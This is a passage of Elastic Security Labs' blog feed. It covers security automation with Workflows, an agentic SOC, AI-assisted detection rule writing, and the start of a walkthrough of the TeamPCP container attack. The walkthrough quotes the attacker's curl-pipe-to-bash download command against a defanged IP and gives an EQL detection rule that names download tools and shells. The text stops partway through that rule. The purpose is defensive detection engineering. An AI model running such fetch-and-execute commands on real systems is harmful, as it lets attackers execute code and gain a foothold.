        VirusTotal: {{ steps.check_virustotal.output | json }}
        Related alerts: {{ steps.related_alerts.output | json }}
    timeout: 10m
</code></pre>
<p>The agent processes the input, calls whatever tools it needs, and returns its findings. The workflow waits, then continues with the next steps: adding the investigation to the case, notifying the team, and updating the case description with a concise summary of what the agent found.</p>
<p>Setting <code>create-conversation: true</code> persists the conversation, so the workflow can fetch the agent's reasoning trail and add it to the case as a structured comment with clickable links to each query it ran. And the analyst gets a direct link to pick up the conversation with the agent if they want to dig deeper.</p>
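<p>One way to attach those findings to the case is the <code>kibana.addCaseComment</code> step mentioned later in this post. A hedged sketch: the parameter names and the <code>output.message</code> field on the agent step are assumptions, not verified schemas:</p>
<pre><code class="language-yaml">  - name: record_findings
    type: kibana.addCaseComment
    with:
      caseId: &quot;{{ steps.create_case.output.id }}&quot;
      comment: |
        **Agent investigation findings**
        {{ steps.escalate_to_agent.output.message }}
</code></pre>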
<h3>Putting it together</h3>
<p>In the full version of this workflow, the three AI steps work in sequence:</p>
<ol>
<li><strong>Classify</strong> the alert to drive the triage decision</li>
<li><strong>Summarize</strong> the alert for the initial case description and Slack notification</li>
<li><strong>Agent</strong> investigates the full scope: persistence, lateral movement, IOCs, affected systems</li>
<li><strong>Summarize</strong> again, this time distilling the agent's findings into a concise, updated case description</li>
</ol>
<p>The case starts with a clean factual overview and evolves into a comprehensive summary as the investigation completes. The agent's full analysis and reasoning trail live as case comments for analysts who want the details.</p>
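<p>The skeleton of that sequence, with the <code>with</code> blocks from the earlier snippets elided:</p>
<pre><code class="language-yaml">steps:
  - name: classify_alert       # 1. drive the triage decision
    type: ai.classify
  - name: initial_summary      # 2. first case description and Slack message
    type: ai.summarize
  - name: escalate_to_agent    # 3. tool-using investigation of the full scope
    type: ai.agent
    agent-id: &quot;security-agent&quot;
    create-conversation: true
  - name: final_summary        # 4. distill the agent's findings into the case
    type: ai.summarize
</code></pre>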
<p>The complete workflow, including the AI investigation pipeline with reasoning trails, clickable Discover links, and follow-up Slack notifications, is available in the <a href="https://github.com/elastic/workflows">Elastic Workflows library on GitHub</a>.</p>
<h2>Workflows as agent tools</h2>
<p>The integration between Workflows and Agent Builder works in both directions. Workflows can call agents (as shown above). And agents can call workflows.</p>
<p>When you expose a workflow as a tool in Agent Builder, an agent can invoke it during a conversation. The agent decides what needs to happen, and the workflow handles the execution reliably and repeatably.</p>
<p>This is the pattern demonstrated in the <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog post</a>: a two-step workflow hands the entire Attack Discovery to an agent, and the agent calls workflow-backed tools to verify malware hashes, search logs, check the on-call schedule, create a case, and spin up a Slack channel. The workflow is the trigger and the safety net. The agent is the brain.</p>
<p>Agents reason. Workflows execute. Together they cover the full range from judgment to action.</p>
<h2>Open by design</h2>
<p>Not every team starts from zero. Some already have automation running in Tines, Splunk SOAR, Palo Alto XSOAR, or another platform. Workflows don't ask you to replace any of your existing tools.</p>
<p>The idea is straightforward: use Workflows for the parts of your automation that are native to Elastic. Alert triage, enrichment from your own indices, case management, and alert status updates. These touch your Elastic data directly, and a native workflow will always be simpler and faster than an external tool making API calls back into Elastic.</p>
<p>For everything else, connectors bridge the gap. We have native connectors for Tines, Resilient, Swimlane, TheHive, D3 Security, Torq, and XSOAR. A workflow can kick off a Tines story, push an incident to Resilient, or trigger any external system via HTTP. Your existing tools handle cross-platform orchestration. Workflows handle what's native. As the capability grows, you can consolidate at your own pace. Nobody's forcing a migration.</p>
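<p>A sketch of that hand-off, assuming a generic HTTP step for the webhook call; the step type name, fields, and webhook URL below are all illustrative, not a documented schema:</p>
<pre><code class="language-yaml">  - name: trigger_tines_story
    type: http                                        # assumed generic HTTP step type
    with:
      method: POST
      url: &quot;https://example.tines.com/webhook/abc123&quot; # hypothetical Tines webhook
      headers:
        Content-Type: &quot;application/json&quot;
      body: |
        {
          &quot;alert_id&quot;: &quot;{{ event.alerts[0]._id }}&quot;,
          &quot;host&quot;: &quot;{{ event.alerts[0].host.name }}&quot;
        }
</code></pre>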
<h2>What's here and what's next</h2>
<p>Workflows is available today. Here's what you can build with it right now:</p>
<ul>
<li><strong>Alert triggers</strong> connect workflows to detection and alerting rules</li>
<li><strong>Case and alert management</strong> through named Kibana steps (<code>kibana.createCase</code>, <code>kibana.SetAlertsStatus</code>, <code>kibana.addCaseComment</code>, and more)</li>
<li><strong>Direct data access</strong> via Elasticsearch search and ES|QL</li>
<li><strong>39 workflow-compatible connectors</strong> covering threat intel (VirusTotal, AbuseIPDB, GreyNoise, Shodan, URLVoid, AlienVault OTX), ticketing (Jira, ServiceNow), communication (Slack, Teams, PagerDuty, email), SOAR platforms (Tines, Resilient, Swimlane, TheHive, and others), and AI providers</li>
<li><strong>AI steps</strong> for classification, summarization, prompts, and Agent Builder invocation of Elastic Agents and Skills</li>
<li><strong>YAML authoring</strong> with autocomplete, validation, and step testing in Kibana</li>
<li><strong>50+ example workflows</strong> on <a href="https://github.com/elastic/workflows">GitHub</a>, including security-specific templates for detection, enrichment, and response</li>
</ul>
<p>What's coming:</p>
<ul>
<li><strong>Visual workflow builder</strong> for drag-and-drop authoring</li>
<li><strong>In-product template library</strong> to browse and install workflows directly in Kibana</li>
<li><strong>Human-in-the-loop</strong> approvals that pause workflows for human input via Slack, email, or the Kibana UI</li>
<li><strong>Natural language authoring</strong> where AI helps translate intent into working workflows</li>
</ul>
<p>Today, authoring is YAML-based. If you've written detection rules or configured CI/CD pipelines, the learning curve is gentle. The editor has built-in autocomplete, validation, and step testing, and the example library gives you templates to start from. A visual builder is coming to make this accessible to a wider audience.</p>
<h2>Get started</h2>
<p>Elastic Workflows is available now. To start building:</p>
<ol>
<li><a href="https://cloud.elastic.co/registration">Start an Elastic Cloud trial</a> or enable Workflows in your existing deployment under <strong>Stack Management &gt; Advanced Settings</strong></li>
<li>Explore the <a href="https://www.elastic.co/docs/explore-analyze/workflows">Workflows documentation</a></li>
<li>Browse the <a href="https://github.com/elastic/workflows">Elastic Workflow Library on GitHub</a> for security templates you can adapt</li>
<li>Read the <a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> for core concepts</li>
<li>See the <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog</a> for a complete Attack Discovery + Workflows + Agent Builder walkthrough</li>
</ol>
<p>Start with the workflow that would save you the most time tomorrow.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/security-automation-with-elastic-workflows/security-automation-with-elastic-workflows.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Streamlining the Security Analyst Experience]]></title>
            <link>https://www.elastic.co/security-labs/streamlining-the-security-analyst-experience</link>
            <guid>streamlining-the-security-analyst-experience</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Alert Triage, Investigation, and Response with Elastic's Agentic Security Operations Platform.]]></description>
            <content:encoded><![CDATA[<p>The term <strong>Agentic SOC (Security Operations Center)</strong> is one of the most popular concepts in security today. But what does it truly mean in practice, and how does Elastic Security approach this next evolution of security operations?</p>
<p>In simple terms, an Agentic SOC is a security operations center that has deployed AI Agents and corresponding AI Agent Skills to perform SOC-related workflows such as detection engineering, alert triage, incident investigation, escalation, response, and threat hunting. When these workflows are performed by AI agents, they’re often called “Agentic workflows.” These AI Agents and Skills may run natively in a security operations platform like SIEM, XDR, or security analytics, or they may be layered on top of legacy SIEM as an “AI SOC Agent” or “AI SOC analyst”, or they may even be run from an AI Coding Tool.</p>
<p>Regardless of how they are implemented, the shift to the Agentic SOC is not about AI replacing human analysts; it's about transforming how the SOC functions. To keep pace with rapidly evolving attackers, defenders must leverage AI and autonomous agents to respond as quickly as possible. At its core, an Agentic SOC is defined by how a security operations center uses <strong>AI and agents to protect against adversaries</strong>.</p>
<p>Let’s simplify a successful security operations center to three fundamental pillars, all of which the Agentic SOC significantly enhances:</p>
<ol>
<li><strong>Observe:</strong> The foundation of all security is centralized data—aggregating logs and events into one location, which is the core strength of a SIEM solution.</li>
<li><strong>Detect:</strong> This involves deploying core protections like endpoint-based security (XDR, such as Elastic Defend) and security solution-focused detections (cloud, identity data). This technology drives the generation of high-quality alerts. Elastic, for example, ships over <a href="https://elastic.github.io/detection-rules-explorer/"><strong>1,700 pre-built rules</strong></a> for its SIEM by default, not including its XDR solution's endpoint rule library.</li>
<li><strong>Act:</strong> This is the critical final stage of triaging, investigating, and acting on the generated alerts.</li>
</ol>
<h2>Agentic SOC in Action</h2>
<p>Imagine this real-life scenario unfolding in your Security Operations Center using the Elastic security platform. It begins not with a siren, but with a simple, direct Slack notification. Building on our recent <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">blog</a> on Attack Discovery, Workflows, and Agent Builder, let's further examine how Elastic Security can help you respond to an active attack.</p>
<ol>
<li><strong>The Initial Alert and Immediate Action</strong><br />
Your security analyst receives an urgent notification in their team channel. This message isn't just a heads-up; it points directly to an observed, active attack. Crucially, the Elastic Agentic SOC has already taken decisive, pre-emptive action: a vulnerable host has been isolated from the network to contain the threat and limit potential damage. This was all powered by Elastic Workflows and Elastic Agent Builder processing real-time alert and attack data from Elastic.<br />
<img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image5.png" alt="Example analyst notification in Slack after the AI agent has performed initial triage." title="Example analyst notification in Slack after the AI agent has performed initial triage." /></li>
<li><strong>The Centralized Case</strong><br />
The analyst's next step is a click away, moving from Slack directly to the centralized Case within Elastic that was created by the workflow. Elastic Case Management enables the SOC to coordinate the response and provides a single pane of glass into all aggregated critical information:</li>
</ol>
<ul>
<li>
<p><strong>Attack Summary:</strong> A high-level overview detailing what has occurred using Attack Discovery.</p>
</li>
<li>
<p><strong>Attached Alerts:</strong> The specific security alerts that triggered the initial observation.</p>
</li>
<li>
<p><strong>Observables:</strong> A list of suspicious artifacts (IP addresses, file hashes, domains, etc.) collected from the event.</p>
</li>
<li>
<p><strong>Attached Events:</strong> Non-alert events that, while not an alert themselves, provide critical context and are of further interest to the investigation.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image2.png" alt="" /></p>
</li>
</ul>
<ol start="3">
<li><strong>Supporting the Investigation</strong><br />
To support the immediate findings, detailed <strong>Investigations</strong> are attached directly to the Case. These searches allow the analyst to visually and contextually step through the sequence of events leading up to, during, and immediately following the attack.<br />
The Elastic Case also provides instant context by highlighting <strong>Similar cases</strong>. By cross-referencing observables, the system identifies previous incidents involving the same entities or artifacts, providing a deeper understanding of the threat actor's history and potential motives.</li>
<li><strong>The Path to Resolution</strong><br />
The agents don’t just catalog the past; they chart the path forward. A clear set of <strong>Next steps and actions</strong> is outlined, with specific team members assigned for review and execution.</li>
</ol>
<p>The analyst then steps through a methodical process reviewing the automated analysis:</p>
<ol>
<li><strong>Reviewing Findings:</strong> Scrutinizing all aggregated data, alerts, and investigations.</li>
<li><strong>Evidence Collection:</strong> Collecting any additional forensic evidence needed for a complete analysis.</li>
<li><strong>Remediation:</strong> Executing manual or automated actions, such as deleting malicious files or killing persistent processes on the isolated host with Elastic Defend.</li>
<li><strong>Final Release:</strong> Eventually, the host is safely released back to the network, but not before additional, targeted rules or policies are automatically applied to prevent a recurrence based on the lessons learned from this incident.<br />
In the Agentic SOC, the analyst moves seamlessly from a high-level alert to a comprehensive investigation to full remediation—all within a unified, intelligent workflow powered by Elastic.</li>
</ol>
<h2>Elastic Security and Core SIEM Workflows</h2>
<p>Before exploring advanced agentic workflows, it's essential to recognize that Elastic Security already provides a comprehensive suite of core capabilities crucial for modern security operations. This foundation begins with the ingestion of security-relevant data, which is automatically normalized to a common schema, ensuring consistency and ease of analysis. The platform offers Extended Detection and Response (XDR) capabilities via Elastic Defend, a robust detection engine built directly into the Elastic Stack, and sophisticated alert workflows that include built-in correlations to reduce noise and surface true threats.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image4.png" alt="" /></p>
<p>Elastic Security further differentiates itself by tightly integrating key operational functions. This includes entity-based threat hunting, machine learning for anomaly detection and behavior analysis, and comprehensive case management for tracking incidents. Finally, the platform provides end-to-end response and forensic capabilities, enabling security teams to move swiftly from initial alert to investigation and remediation, all within a unified, scalable platform.</p>
<h2>Empowering Analysts with Agentic Capabilities</h2>
<h3>AI-Powered Alert Triage and Prioritization</h3>
<p>The Elastic Security Solution integrates AI capabilities via <strong>Agent Builder</strong> to augment and make SOC operations truly agentic. This is where efficiency improvements are most keenly felt:</p>
<ul>
<li><strong>Conversational Triage:</strong> A built-in agent is readily available to Tier 1/2 analysts, allowing them to use conversational commands to query and prioritize open alerts (e.g., &quot;What priority alerts should I review from the last 30 days?&quot;). This is the first entry point for using AI to augment SOC operations.</li>
<li><strong>LLM Agnostic Platform:</strong> A key differentiating feature of Elastic's <strong>Agent Builder</strong> is that it is <strong>LLM agnostic</strong>, allowing organizations to pick their preferred model, even locally running models for privacy or regulatory reasons.</li>
<li><strong>Attack Discovery:</strong> This premier feature moves beyond basic triage. It uses LLM configurations to create <strong>higher-order attack detections</strong>, taking hundreds of open alerts and prioritizing them into a small, manageable subset of known attacks or incidents. This dramatically reduces the impact of alert fatigue.</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image3.png" alt="" /></p>
<h3>Enriched Investigations</h3>
<p>Once an attack or incident is found, the agent helps start the investigation:</p>
<ul>
<li><strong>Summarization and Enrichment:</strong> The agent can be used to summarize the attack, identify important artifacts, and conduct automated third-party enrichments (like checking VirusTotal). This tailored experience provides a full assessment, including an attack chain, threat intelligence information, related cases, entity risk scoring, and a full investigation guide.</li>
<li><strong>Case Management:</strong> The agent can be instructed to take immediate action, such as generating a security case and notifying the team in Slack, all through simple conversational commands that execute pre-configured workflows.</li>
</ul>
<h3>Automated Response and Threat Hunting</h3>
<p>The true power of the Agentic SOC is realized through action and automation that goes beyond simple conversation:</p>
<ul>
<li>
<p><strong>Workflows and SOAR-like Automation:</strong> Agents can reference and execute <strong>Workflows</strong>, Elastic's SOAR-like automation tool. These workflows allow analysts to take immediate, complex actions. For example, a command like &quot;Please create a case for this attack, and notify my team in Slack&quot; triggers multiple, pre-defined steps. Further critical response actions, such as <strong>isolating a host</strong>, can be executed with a single workflow action while the investigation continues.</p>
</li>
<li>
<p><strong>AI-Assisted Threat Hunting:</strong> AI assists threat hunters by leveraging <strong>Entity Analytics</strong> and pre-built skills. The agent can be asked to find high-risk hosts and users to begin hunting, and then automatically generate specific ESQL queries (e.g., &quot;Please tell me the most uncommon processes executed for each host&quot;) to uncover unusual or malicious activity.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image1.png" alt="" /></p>
</li>
</ul>
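<p>For the last prompt, the query an agent generates might look roughly like this in ES|QL; the index pattern, field names, and rarity threshold are illustrative assumptions:</p>
<pre><code class="language-esql">FROM logs-endpoint.events.process-*
| WHERE event.type == &quot;start&quot;
| STATS execution_count = COUNT(*) BY host.name, process.name
| WHERE execution_count &lt;= 2
| SORT execution_count ASC
</code></pre>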
<h3>The Mandate of Automation</h3>
<p>For maximum effectiveness, all these steps, from alert triage and enrichment to case creation and host isolation, can be configured to run <strong>automatically</strong> as an Agentic Alert Triage workflow. This allows the system to solve problems as soon as they are discovered, keeping the human analyst in the loop with a consolidated case and all the necessary findings in a single pane of glass.</p>
<p>This approach delivers substantial <strong>efficiency improvements</strong>, making speed the single most important factor in a modern, Agentic SOC.</p>
<h2>Elastic’s Agentic Security Operations Platform</h2>
<p>Whether you use our UI, our agents, or your own, Elastic Security provides a strong open foundation for modern security operations: best-in-class data architecture, search, workflows, analytics, detection engineering content, and automation.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly.</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/streamlining-the-security-analyst-experience.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Supercharge Your SOC]]></title>
            <link>https://www.elastic.co/security-labs/supercharge-your-soc</link>
            <guid>supercharge-your-soc</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Detection Engineering in the Era of AI Agents - The New Frontier.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>The landscape of cybersecurity is evolving, and the role of the Detection Engineer (DE) is more critical and demanding than ever. Traditionally, this role involves a comprehensive, end-to-end workflow: from threat modeling and telemetry tuning to writing, testing, and maintaining performance-optimized detection rules to flag malicious behavior.</p>
<p><strong>Elastic Security is purpose-built to streamline this entire workflow, empowering DEs - and anyone involved in security operations - to build, manage, and optimize detection rules at scale. This allows security teams to concentrate their efforts on the most critical task: protecting the organization.</strong></p>
<p>The rise of generative AI and, more specifically, advanced AI <strong>coding agents</strong> like Claude and Cursor, is fundamentally changing and supercharging this workflow.  These tools are no longer just for general software development; they are becoming expert partners for the Security Operations Center (SOC). By integrating the power of conversational AI, these agents can take high-level security requirements and instantly translate them into validated, workable detection logic.</p>
<h2>From Generalist to Elastic Expert: Agent Skills</h2>
<p>Elastic Security is embracing this shift not only by building native AI capabilities into our agentic security operations platform, but also by <a href="https://www.elastic.co/search-labs/blog/agent-skills-elastic">open-sourcing <strong>agent skills for third-party agentic IDEs</strong></a>, a native platform experience that spans the entire Elastic ecosystem (Security, Observability, etc.). By loading these skills into any agent runtime, your AI assistant moves from being a generalist to an on-demand expert in Elastic’s tooling. You can then ask your agent to triage alerts or, in this context, expertly create and tune detection rules.</p>
<h2>A Use Case Walkthrough: The Notepad++ Attack</h2>
<p>To illustrate the agent’s power, let’s look at a real-world supply chain attack involving a backdoor targeting the Notepad++ infrastructure, described in Elastic Security Labs’ blog, <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">“Speeding APT Attack”</a>.</p>
<h3>Instant Conditional Rules</h3>
<p>A detection engineer’s first step is often to create conditional rules based on known Indicators of Compromise (IOCs). To begin, we can instruct the agent to investigate data within Elastic Security, as evidence of the attack was present in our cluster.</p>
<pre><code>&quot;Can you help me create a detection rule that will detect malicious activity similar
 to what I'm seeing in my Elastic Security deployment involving notepad++.exe 
 and BluetoothService.exe?&quot;
</code></pre>
<p>The agent immediately went to work:</p>
<ul>
<li>It rapidly found process lineage and documented attack details.</li>
<li>It extracted key IOCs and found the corresponding MITRE ATT&amp;CK™ mappings.</li>
<li>It generated two foundational rules: one for a suspicious child process spawned by <strong>Notepad++</strong>, and one focusing on the masqueraded executable.</li>
<li>Crucially, the rules were immediately tested against threat emulation data, confirming multiple successful hits.</li>
</ul>
<p>Each step happens quickly, and the built-in validation significantly accelerates the 'test and tune' phase.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image2.png" alt="Agent progress initiating creation of conditional detection rules (Claude Code shown)" title="Agent progress initiating creation of conditional detection rules (Claude Code shown)" /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image7.png" alt="Agent report after creating two conditional detection rules (Claude Code shown)" title="Agent report after creating two conditional detection rules (Claude Code shown)" /></p>
<p>Let’s take a look at the agent-created rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image3.png" alt="Agent-created rule details appear seamlessly in Elastic Security" title="Agent-created rule details appear seamlessly in Elastic Security" /></p>
<h3>Diving into Advanced ESQL Aggregation</h3>
<p>Conditional logic is great, but modern threats require more behavioral and entity-focused detections. Using Elastic’s powerful piping language, <a href="https://www.elastic.co/docs/reference/query-languages/esql">ES|QL</a> (the Elasticsearch Query Language), the agent was challenged to create an <strong>aggregation-based rule</strong> that looks for generic, suspicious characteristics across tasks, aggregates them, and assigns a dynamic risk score to host and user entities.</p>
<p>The agent delivered, creating an advanced query that looks for suspicious executables, negates benign directories, and assesses scores based on the activity's risk level. This demonstrates the agent's ability to create sophisticated detections unique to Elastic's capabilities, moving beyond simple lookups to complex entity analytics.</p>
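<p>The general shape of such an aggregation rule looks roughly like this; the field names, excluded paths, and scoring thresholds are illustrative, not the agent's actual output:</p>
<pre><code class="language-esql">FROM logs-endpoint.events.process-*
| WHERE process.name LIKE &quot;*Service.exe&quot;
    AND NOT process.executable LIKE &quot;C:\\Windows\\*&quot;
| STATS suspicious_executions = COUNT(*) BY host.name, user.name
| EVAL risk_score = CASE(suspicious_executions &gt; 10, 90,
                         suspicious_executions &gt; 3, 70,
                         40)
| SORT risk_score DESC
</code></pre>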
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image4.png" alt="Agent creating aggregation-based detection rule (Claude Code shown)" title="Agent creating aggregation-based detection rule (Claude Code shown)" /></p>
<p>Here’s the rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image1.png" alt="More complex aggregation-based rule appears properly in Elastic Security" title="More complex aggregation-based rule appears properly in Elastic Security" /></p>
<h2>Sequential Detections with EQL and Suppression</h2>
<p>To detect multi-stage attacks, a <strong>sequential rule</strong> is essential—if Event A, then Event B, then Event C, then alert. Using the <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/eql">Event Query Language (EQL)</a>, the agent crafted a perfect three-stage sequence for the attack:</p>
<ol>
<li>Unsigned dropper activity.</li>
<li>Service masquerade (implant deployed).</li>
<li>Final execution for persistence.</li>
</ol>
<p>To make the rule more reliable and reduce noise, suppression logic was then added, focusing on limiting alerts per unique Host ID. This quick iteration shows how an agent can help a detection engineer rapidly move from a basic detection to a highly robust, multi-stage rule.</p>
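<p>Illustratively, the three stages map to an EQL sequence of this general shape (a sketch with assumed field values, not the agent’s generated rule; alert suppression is configured on the rule itself rather than in the query):</p>
<pre><code class="language-sql">sequence by host.id with maxspan=30m
  /* 1. unsigned dropper activity */
  [process where event.type == &quot;start&quot; and process.code_signature.trusted == false]
  /* 2. implant dropped under a service-like name in a user directory */
  [file where event.type == &quot;creation&quot; and file.path : &quot;?:\\Users\\*&quot; and file.name : &quot;*Service*.exe&quot;]
  /* 3. final execution for persistence under services.exe */
  [process where event.type == &quot;start&quot; and process.parent.name : &quot;services.exe&quot;]
</code></pre>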
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image6.png" alt="Agent creating advanced sequence-based detection rule (Claude Code shown)" title="Agent creating advanced sequence-based detection rule (Claude Code shown)" /></p>
<h2>The LLM-Augmented Query: Summaries in the Alert</h2>
<p>The ultimate demonstration of the new agentic workflow is using <a href="https://www.elastic.co/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion">Elastic’s <strong>ES|QL COMPLETION syntax</strong></a>. This feature allows an inference model to be referenced <em>directly within the query</em>.</p>
<p>The prompt asked the agent to:</p>
<pre><code>Based off this recent elastic blog,
 https://www.elastic.co/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion, 
 create a rule that incorporates a COMPLETION command with my  default inference 
 model that will summarize findings from attack into one &quot;esql.summary&quot;
</code></pre>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image5.png" alt="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" title="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" /></p>
<p>The result? The generated rule didn't just fire an alert; it natively included an <strong>ES|QL summary row</strong> in the alert itself:</p>
<blockquote>
<p>This telemetry shows a masquerading technique where a process named &quot;BluetoothService.exe&quot; is executing from a user's AppData directory with a PE original name of &quot;BDSubWiz.exe&quot; (a legitimate file mismatch), running as SYSTEM with service-like characteristics including spawning from services.exe, indicating persistence establishment (MITRE ATT&amp;CK T1036.004 Masquerading and T1543 Service Persistence). The executable's location in a user directory, combined with SYSTEM-level execution, service persistence indicators, and the name/PE mismatch across multiple events, suggests Defense Evasion and Persistence stages. This represents high severity due to successful SYSTEM-level persistence with active defense evasion through masquerading.</p>
</blockquote>
<p>This cuts triage time dramatically, as analysts no longer need to pivot to a separate runbook to understand the context and severity of the alert.</p>
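<p>For orientation, a COMPLETION-augmented query takes roughly this shape. This is a sketch only: the inference endpoint name is a placeholder, and the COMPLETION syntax is version-dependent, so consult the linked post and the current ES|QL reference for the exact form.</p>
<pre><code class="language-sql">FROM .alerts-security.alerts-default
| EVAL prompt = CONCAT(&quot;Summarize this alert for a SOC analyst: &quot;, process.command_line)
| COMPLETION summary = prompt WITH { &quot;inference_id&quot; : &quot;my-default-model&quot; }
| KEEP host.name, process.name, summary
</code></pre>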
<h2>The Agentic SOC is Here</h2>
<p>The collaboration between AI agents and the Elastic Security solution provides a glimpse into Elastic’s <a href="https://www.elastic.co/security-labs/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc"><strong>Agentic SOC</strong></a> of the future. It’s a world where detection engineers can have a conversation, define their intent, and instantly generate, test, and deploy highly sophisticated, context-rich detection rules. This is not about replacing the human expert, but about augmenting their knowledge and accelerating their workflow, allowing them to focus on high-value threat intelligence and modeling.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly.</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/supercharge-your-soc.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Linux & Cloud Detection Engineering - TeamPCP Container Attack Scenario]]></title>
            <link>https://www.elastic.co/security-labs/teampcp-container-attack-scenario</link>
            <guid>teampcp-container-attack-scenario</guid>
            <pubDate>Fri, 20 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This publication provides a real-world walkthrough of TeamPCP's multi-stage container compromise, demonstrating how Elastic's D4C surfaces runtime signals across each stage of the attack chain.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>In <a href="https://www.elastic.co/security-labs/getting-started-with-defend-for-containers">the previous article</a>, we examined how Defend for Containers (D4C) is deployed, how its policy model operates, and how its runtime telemetry is structured. With that foundation in place, the next step is to move from configuration and field analysis to applied detection engineering.</p>
<p>This post walks through a realistic container attack scenario based on the TeamPCP cloud-native ransomware operation, as <a href="https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware">documented by Flare</a>. Rather than analyzing isolated techniques in abstraction, we follow the attack as it unfolds inside a containerized environment and examine how each stage manifests in D4C telemetry.</p>
<p>When mapped to MITRE ATT&amp;CK, the activity in this scenario spans nearly the entire attack lifecycle. The intrusion progresses from execution and discovery inside the container to persistence, lateral movement, command-and-control activity, and ultimately impact.</p>
<p>By mapping these behaviors to concrete detection logic, this article demonstrates how D4C enables detection engineers to identify container compromise not as isolated suspicious commands, but as part of a structured attack chain.</p>
<h2>TeamPCP - an emerging force in the cloud native and ransomware landscape</h2>
<p>This scenario walks through the container compromise and propagation stage of the TeamPCP cloud-native ransomware operation, recently researched and documented by Flare. Rather than treating this as an abstract case study, the flow below mirrors how the attack plays out in practice and shows how D4C telemetry and pre-built detections surface each stage of the intrusion.</p>
<p>At a high level, the threat actor’s objectives in this stage are:</p>
<ol>
<li>Gain interactive code execution inside a container</li>
<li>Determine whether the workload runs in Kubernetes</li>
<li>Establish durable execution and persistence</li>
<li>Propagate laterally across pods and nodes</li>
<li>Prepare the environment for large-scale monetization (mining, ransomware, or resale)</li>
</ol>
<p>Each of these goals leaves behind observable runtime behavior that D4C is well-positioned to detect.</p>
<h3>Stage 1 – Initial execution via download and pipe-to-shell</h3>
<p>The attack begins with a familiar but effective technique: downloading and immediately executing a script via a shell pipeline.</p>
<pre><code class="language-shell">curl -fsSL http://67.217.57[.]240:666/files/proxy.sh | bash
</code></pre>
<p>The intent here is to gain immediate execution while avoiding file creation. This is a classic tradecraft choice: no payload written to disk, no obvious artifact to scan.</p>
<p>From D4C's perspective, this still results in a highly suspicious runtime pattern. An interactive <code>curl</code> process executes inside a container and immediately spawns a shell interpreter. The parent–child relationship, command line, and container context are all captured.</p>
<pre><code class="language-sql">sequence by process.parent.entity_id, container.id with maxspan=1s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
   process.name in (&quot;curl&quot;, &quot;wget&quot;)]
  [process where event.action in (&quot;exec&quot;, &quot;end&quot;) and
   process.name like (
     &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;,
     &quot;python*&quot;, &quot;perl*&quot;, &quot;ruby*&quot;, &quot;lua*&quot;, &quot;php*&quot;
   ) and
   process.args like (
